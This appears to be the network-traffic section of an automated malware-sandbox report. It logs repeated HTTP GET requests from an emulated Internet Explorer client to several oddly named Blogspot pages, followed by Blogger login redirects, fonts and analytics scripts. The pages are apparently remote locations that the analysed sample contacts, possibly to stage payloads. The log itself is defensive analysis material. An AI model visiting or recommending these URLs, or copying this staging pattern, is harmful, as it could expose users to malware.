Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://randikhanaekminar.blogspot.com/p/ayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fonts.gstatic.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
